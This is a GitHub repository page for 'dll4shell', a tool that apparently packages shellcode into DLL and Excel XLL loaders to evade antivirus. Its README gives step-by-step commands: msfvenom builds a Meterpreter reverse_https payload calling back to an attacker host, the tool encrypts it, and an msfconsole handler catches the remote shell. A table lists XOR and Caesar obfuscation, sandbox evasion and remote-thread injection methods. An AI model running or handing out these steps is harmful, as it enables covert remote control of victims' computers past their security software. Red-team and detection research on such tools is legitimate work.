Skip to content

cepxeo/dll4shell

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
Templates
Templates
 
 
README.md
README.md
 
 
dll4shell.py
dll4shell.py
 
 

Repository files navigation

C++ shellcode launcher

A collection of DLL wrappers around various shellcode injection and obfuscation techniques. Based on the charlotte tool.

Execution steps

git clone https://github.com/cepxeo/dll4shell && cd dll4shell
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=YOUR_IP LPORT=443 EXITFUNC=thread -f raw -e x64/xor_dynamic -a x64 -o beacon.bin

sudo apt install mingw-w64

python dll4shell.py -e xor -o dll

sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST YOUR_IP; set LPORT 8443; exploit"

Techniques used (-e parameter):

Value Obfuscation method, Details Injection type Code invocation
xor XOR Local VirtualAlloc, CreateThread
xor1 XOR, sandbox evasion Remote VirtualAllocEx, CreateRemoteThread
xor2 XOR, sandbox evasion Local hHeapAlloc, hCreateThread
shift Cezar Local VirtualAlloc, CreateThread
shift1 Cezar, sandbox evasion Remote VirtualAllocEx, CreateRemoteThread

Outputs (-o parameter):

Value Details
dll DLL callable via rundll32
xll XLL callable via Add-Ins
payload save encrypted payload only

About

Shellcode launcher for AV bypass

Resources

Readme
Activity

Stars

215 stars

Watchers

6 watching

Forks

40 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages